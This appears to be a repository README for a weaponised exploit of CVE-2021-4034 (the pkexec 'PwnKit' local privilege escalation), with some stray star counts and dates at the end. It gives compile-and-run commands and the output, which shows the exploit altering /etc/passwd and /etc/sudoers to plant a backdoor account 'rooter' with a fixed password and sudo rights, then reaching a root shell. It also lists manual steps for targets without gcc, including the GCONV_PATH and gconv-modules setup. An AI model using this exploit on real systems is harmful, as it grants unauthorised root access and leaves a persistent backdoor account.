CVE-2021-4034
CVE-2021-4034 Add Root User - Pkexec Local Privilege Escalation
根据CVE-2021-4034进行了加强,执行Exploit将会默认添加用户名rooter,密码Hello@World,并且rooter用户将具有sudo权限。
Refer to CVE-2021-4034, executing Exploit will add username rooter, password Hello@World by default, and The rooter user will have sudo privileges.
Usage
test@some:~$ gcc cve-2021-4034.c -o ./exp
test@some:~$ ./exp
/etc/passwd successfully backed up to /tmp/passwd.bak
File Open successed!
[+]Change sudoers priv.
/etc/sudoers successfully backed up to /tmp/sudoers.bak
File Open successed!
[+]Add Root User Success...
test@some:~$ su rooter
Password:
root@some:/home/test# id
uid=0(root) gid=0(root) groups=0(root)
root@some:/home/test#
手动提权
如果目标环境没有gcc,可手动执行命令,并在本地编译pwnkit.so。
创建利用环境 - 目标机器
$ mkdir -p 'GCONV_PATH=.'; touch 'GCONV_PATH=./pwnkit'; chmod a+x 'GCONV_PATH=./pwnkit'
$ mkdir -p pwnkit; echo 'module UTF-8// PWNKIT// pwnkit 2' > pwnkit/gconv-modules
编译pwnkit.so 与 pkexec - 本地
$ mkdir pwnkit
$ gcc pwnkit.so.c -o pwnkit/pwnkit.so -lcrypt -shared -fPIC
$ gcc pkexec.c -o pkexec
执行Exploit
- 将pwnkit文件夹上传到目标机器
- 将pkexec上传到目标机器
- 执行pkexec
$ ./pkexec
/etc/passwd successfully backed up to /tmp/passwd.bak
File Open successed!
[+]Change sudoers priv.
/etc/sudoers successfully backed up to /tmp/sudoers.bak
File Open successed!
[+]Add Root User Success...
9 Oct 22, 2022
60 Nov 10, 2022
3 Jun 19, 2022
13 Dec 27, 2022
437 Dec 31, 2022
213 Nov 19, 2022
39 Nov 9, 2022
2 Oct 2, 2021
20 Jun 22, 2022
702 Dec 28, 2022
933 Dec 22, 2022
3 Jun 30, 2022
2 Jan 26, 2022
1.7k Jan 3, 2023
334 Jan 5, 2023
35 Nov 9, 2022
6 May 24, 2022
1.1k Dec 28, 2022